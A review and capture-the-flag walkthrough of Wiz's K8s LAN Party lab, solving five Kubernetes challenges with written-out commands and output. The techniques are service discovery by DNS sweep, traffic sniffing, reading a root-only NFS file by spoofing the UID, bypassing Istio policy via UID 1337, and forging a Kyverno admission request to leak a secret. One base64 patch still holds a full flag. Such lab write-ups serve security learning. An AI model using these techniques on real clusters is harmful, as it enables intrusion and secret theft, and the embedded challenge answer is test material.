Review of K8s LAN Party – a set of browser-based challenges for hunting vulnerabilities in a Kubernetes cluster

I continue to test tools that help me learn how to secure Kubernetes clusters. This time let's take a look at Kubernetes LAN Party, a CTF-style challenge from the Wiz Research team. Its release was timed to coincide with the KubeCon EMEA 2024 conference held in March this year.

In this article I will explain why this tool exists, walk through all the scenarios K8s LAN Party offers, and share my opinion on how good the tool is and who will benefit from it.

Not long ago I reviewed Simulator, a platform for training Kubernetes security engineers on CTF scenarios.

What is K8s LAN Party and why is it needed?

K8s LAN Party is a set of five CTF scenarios in which the user needs to find vulnerabilities in a Kubernetes cluster. Each scenario focuses on a Kubernetes networking problem that Wiz Research engineers encountered in real-life practice. The tool will help participants deepen their knowledge of Kubernetes cluster security: they will have the opportunity to step into the shoes of attackers and study configuration errors, which will be useful in their work.

In K8s LAN Party the cluster is already deployed; the player only needs to run commands in a terminal right in the browser. Registered users appear on the shared leaderboard and receive a certificate of participation after completing the challenge.

K8s LAN Party has the following rules:

  • You can complete the scenarios in any order.

  • The maximum score for a task is 10 points. Each task also offers two hints; using a hint deducts points from your final score.

  • The flags to find in each scenario have the format wiz_k8s_lan_party{*}. Enter each flag in the input field on the task page:

After selecting a task, a terminal appears in which you will need to execute the commands:

Let's go through the scenarios in order, starting with Recon.

Scenario #1: Recon

In this scenario, we are in a compromised Kubernetes environment where we must find hidden internal services. For this task we are given the dnscan utility.

First, find out what subnet we are on:

player@wiz-k8s-lan-party:~$ printenv 
HISTSIZE=2048
PWD=/home/player
HOME=/home/player
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
...

The environment variables show the kubernetes API service at 10.100.0.1, so the cluster's service network is most likely 10.100.0.0/16. Let's scan it:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
34997 / 65536 [--------------------------------------------------------------------->____________________________________________________________] 53.40% 982 p/s10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65430 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.84% 982 p/s10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
65536 / 65536 [---------------------------------------------------------------------------------------------------------------------------------] 100.00% 985 p/s
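Under the hood, dnscan's discovery trick is a reverse-DNS sweep: Kubernetes publishes a PTR record for every Service ClusterIP, so any IP that resolves belongs to an in-cluster service. A minimal single-threaded sketch of the idea in Python (the `scan_subnet` helper is mine, not part of dnscan):

```python
import ipaddress
import socket

def scan_subnet(cidr: str) -> dict[str, str]:
    """Reverse-resolve every host IP in the subnet, as dnscan does.

    In a cluster, each Service ClusterIP has a PTR record, so an IP
    that resolves maps to a discoverable in-cluster service name.
    """
    found = {}
    for ip in ipaddress.ip_network(cidr).hosts():
        try:
            name, _, _ = socket.gethostbyaddr(str(ip))
            found[str(ip)] = name
        except OSError:
            pass  # no PTR record -> nothing advertised at this IP
    return found
```

Inside the lab, `scan_subnet("10.100.0.0/16")` would surface the same getflag-service entry, though far more slowly than dnscan's parallel scanner.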

The utility found the getflag-service service. Let's query it:

player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{<flag>}

We found the flag. We indicate it in the input field on the task page and get success:

Scenario #2: Finding neighbors

The authors write that a sidecar container is lurking in our environment and may be transmitting sensitive data. Let's use dnscan again; maybe it will find some additional services:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
43867 / 65536 [--------------------------------------------------------------------------------------->__________________________________________] 66.94% 984 p/s10.100.171.123 reporting-service.k8s-lan-party.svc.cluster.local.
65330 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.69% 984 p/s10.100.171.123 -> reporting-service.k8s-lan-party.svc.cluster.local.
65528 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.99% 984 p/s
player@wiz-k8s-lan-party:~$ curl reporting-service.k8s-lan-party.svc.cluster.local
player@wiz-k8s-lan-party:~$ 

This time curl returned nothing from the service. Let's capture all the traffic inside the pod and write it to a dump file:

player@wiz-k8s-lan-party:~$ tcpdump -s 0 -n -w dump.pcap
tcpdump: listening on ns-c75457, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C28 packets captured
28 packets received by filter
0 packets dropped by kernel

Now let's look for something interesting in the dump. We know the flag we are looking for carries the wiz_k8s_lan_party prefix:

player@wiz-k8s-lan-party:~$ tcpdump -r dump.pcap -A | grep wiz_k8s_lan_party
reading from file dump.pcap, link-type EN10MB (Ethernet), snapshot length 262144
wiz_k8s_lan_party{<flag>}
wiz_k8s_lan_party{<flag>}

Another flag found. Copy it and paste it into the input field on the task page to complete the task.
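The search step above is just a byte-pattern grep over the capture file. If tcpdump were not available for the offline pass, the same scan can be done with a few lines of stdlib Python (the `find_flags` helper is mine; it treats the pcap as opaque bytes rather than parsing packets):

```python
import re

def find_flags(path: str) -> set[bytes]:
    """Search raw capture bytes for flag strings.

    A crude stand-in for `tcpdump -A | grep`: flags are plain ASCII,
    so they are visible in the raw bytes of any pcap file.
    """
    with open(path, "rb") as f:
        data = f.read()
    return set(re.findall(rb"wiz_k8s_lan_party\{[^}]*\}", data))
```

Running `find_flags("dump.pcap")` in the lab would return the same flag the grep pipeline printed, deduplicated.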

Scenario #3: Data leakage

This scenario uses a storage system where access control is network-based. Apparently, an NFS share is mounted into the pod. Let's check:

player@wiz-k8s-lan-party:~$ df -h
Filesystem                                          Size  Used Avail Use% Mounted on
overlay                                             300G   24G  277G   8% /
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/  8.0E     0  8.0E   0% /efs
tmpfs                                                60G   12K   60G   1% /var/run/secrets/kubernetes.io/serviceaccount
tmpfs                                                64M     0   64M   0% /dev/null

Indeed, an NFS share is mounted at /efs. Let's see what's in this directory:

player@wiz-k8s-lan-party:~$ ls -lah /efs
total 8.0K
drwxr-xr-x 2 root   root   6.0K Mar 11 11:43 .
drwxr-xr-x 1 player player   51 Mar 25 08:27 ..
---------- 1 daemon daemon   73 Mar 11 13:52 flag.txt
player@wiz-k8s-lan-party:~$ cat /efs/flag.txt 
cat: /efs/flag.txt: Permission denied

The flag we need is here, but we do not have enough rights to view it. Let's use the nfs-cat utility to read the file, remembering to specify the NFS version, UID, and GID:

player@wiz-k8s-lan-party:~$ nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0&gid=0"
wiz_k8s_lan_party{<flag>}

Another flag found. Onward.
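The trick here is that with AUTH_SYS authentication the NFS server simply trusts whatever UID/GID the client claims, so asking for uid=0&gid=0 sidesteps the file's 000 mode. A small sketch of how the nfs:// URL consumed by nfs-cat is assembled (the `nfs_url` helper is mine):

```python
from urllib.parse import urlencode

def nfs_url(host: str, path: str, version: int = 4,
            uid: int = 0, gid: int = 0) -> str:
    """Build an nfs:// URL for nfs-cat/libnfs-style tools.

    With AUTH_SYS the server accepts the client-asserted uid/gid,
    which is why claiming uid=0&gid=0 grants access to the file.
    """
    query = urlencode({"version": version, "uid": uid, "gid": gid})
    return f"nfs://{host}/{path}?{query}"
```

For the share in this scenario, `nfs_url("fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com", "/flag.txt")` reproduces the exact URL passed to nfs-cat above.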

Scenario #4: Bypassing Boundaries

The task description says that this environment uses a service mesh, and the following restrictive Istio AuthorizationPolicy is applied:

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]

Let's use dnscan to search for services in this environment:

root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.0/16
57388 / 65536 [----------------------------------------------------------------------------------------------------------------->________________] 87.57% 988 p/s10.100.224.159 istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
65491 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.93% 988 p/s10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
RBAC: access denied

We found the istio-protected-pod-service service; however, querying it is blocked by the Istio policy.

Here it is worth recalling an interesting Istio quirk that our colleagues from Luntry wrote about: an attacker who gets inside a pod running an Istio sidecar only needs to switch to UID or GID 1337 (the istio-proxy user) to bypass Istio's traffic filtering, because the iptables rules installed by istio-init exclude that UID from redirection. Let's try it:
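The mechanism can be summarized in a toy model: istio-init redirects all egress traffic from the pod into the Envoy sidecar except traffic owned by UID/GID 1337, so the proxy's own traffic does not loop back into itself. This sketch (names and simplification are mine, not Istio code) captures the decision the iptables OUTPUT chain makes:

```python
ISTIO_PROXY_UID = 1337  # the user istio-proxy runs as inside the sidecar

def redirected_to_sidecar(uid: int) -> bool:
    """Toy model of the OUTPUT rules installed by istio-init.

    All egress packets are redirected into Envoy, EXCEPT those owned
    by UID 1337 -- the carve-out that keeps the proxy's own traffic
    from looping. A process running as that UID therefore talks to
    the network directly, skipping mesh policy enforcement.
    """
    return uid != ISTIO_PROXY_UID
```

This is exactly why `su istio` (a user with UID 1337) below lets curl reach the protected service unfiltered.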

root@wiz-k8s-lan-party:~# su istio
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{<flag>}

The last flag remains.

Scenario #5: Lateral movement

The environment for this scenario uses the Kyverno admission controller. We are given a Kyverno policy that adds a FLAG environment variable to pods created in the sensitive-ns namespace:

apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
    - name: inject-env-vars
      match:
        resources:
          kinds:
            - Pod
      mutate:
        patchStrategicMerge:
          spec:
            containers:
              - name: "*"
                env:
                  - name: FLAG
                    value: "{flag}"

Let's try to create a pod. We write a standard manifest for an nginx pod and apply it in the sensitive-ns namespace:

apiVersion: v1
kind: Pod
metadata:
  name: pod
  namespace: sensitive-ns
spec:
  containers:
  - name: nginx
    image: nginx:latest
    ports:
    - containerPort: 80

Unfortunately, we don't have permission to create pods in this namespace:

player@wiz-k8s-lan-party:~$ kubectl apply -f pod.yaml 
2024/03/31 18:27:19 Starlark failed to allocate 4GB address space: cannot allocate memory. Integer performance may suffer.
Error from server (Forbidden): error when retrieving current configuration of:
Resource: "/v1, Resource=pods", GroupVersionKind: "/v1, Kind=Pod"
Name: "pod", Namespace: "sensitive-ns"
from server for: "pod.yaml": pods "pod" is forbidden: User "system:serviceaccount:k8s-lan-party:default" cannot get resource "pods" in API group "" in the namespace "sensitive-ns"

Looks like it's time to take advantage of the hints:

Hint #1

Need help writing AdmissionReview requests? Use https://github.com/anderseknert/kube-review

Hint #2

This exercise has three components: the Kyverno service hostname (findable with dnscan), the corresponding HTTP path (see the Kyverno source code), and the AdmissionReview request.

So we need to find the available Kyverno services. Let's scan the service network with dnscan:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

We need to send a request to the kyverno-svc.kyverno.svc.cluster.local service that simulates pod creation, so the controller mutates the pod by adding the variable according to the apply-flag-to-env policy. To do this, we craft an AdmissionReview request for the /mutate endpoint, which invokes the mutating webhook.

We build the AdmissionReview request following the documentation, or with the kube-review tool. We fill in the required fields, including the one that matters most for this task: the FLAG variable, whose value we will see once the request is processed:

{
    "apiVersion": "admission.k8s.io/v1",
    "kind": "AdmissionReview",
    "request": {
      "kind": {
        "group": "",
        "version": "v1",
        "kind": "Pod"
      },
      "resource": {
        "group": "",
        "version": "v1",
        "resource": "pods"
      },
      "requestKind": {
        "group": "",
        "version": "v1",
        "kind": "Pod"
      },
      "requestResource": {
        "group": "",
        "version": "v1",
        "resource": "pods"
      },
      "namespace": "sensitive-ns",
      "operation": "CREATE",
      "object": {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {
          "name": "pod",
          "namespace": "sensitive-ns"
        },
        "spec": {
          "containers": [
            {
              "name": "nginx",
              "image": "nginx:latest",
              "env": [
                {
                  "name": "FLAG",
                  "value": "{flag}"
                }
              ]
            }
          ]
        }
      }
    }
  }

Let's call the Kyverno service:

player@wiz-k8s-lan-party:~$ curl -k -X POST https://kyverno-svc.kyverno.svc.cluster.local/mutate -H "Content-Type: application/json" --data '<json>'

As a result we got a response in which the information we are interested in is Base64-encoded:

"response": {
    "uid": "",
    "allowed": true,
    "patch": "W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d",
    "patchType": "JSONPatch"
  }
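Kyverno returns its mutation as a Base64-encoded JSONPatch in the patch field. A couple of stdlib lines are enough to decode it (the `decode_patch` helper is mine):

```python
import base64
import json

def decode_patch(patch_b64: str) -> list[dict]:
    """Decode the base64 JSONPatch from an AdmissionReview response.

    Kyverno's mutating webhook returns patchType "JSONPatch": a list
    of RFC 6902 operations, base64-encoded in the "patch" field.
    """
    return json.loads(base64.b64decode(patch_b64))
```

Applied to the patch value above, this yields the list of operations, including the replace that injects the flag into /spec/containers/0/env/0/value.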

This string contains our flag (after Base64 decoding). We paste it into the input field and complete the final scenario.

The service congratulates us on passing, and now we can receive a certificate:

Results

Compared to the Simulator we reviewed earlier, K8s LAN Party is simpler in functionality: it is a single challenge with a fixed set of tasks. Only scenario #5 is likely to cause any real difficulty. That said, the tasks are quite interesting.

First of all, I recommend K8s LAN Party to novice engineers interested in the security of Kubernetes clusters. But more experienced specialists will also find it worthwhile to work through the vulnerabilities presented in the scenarios.
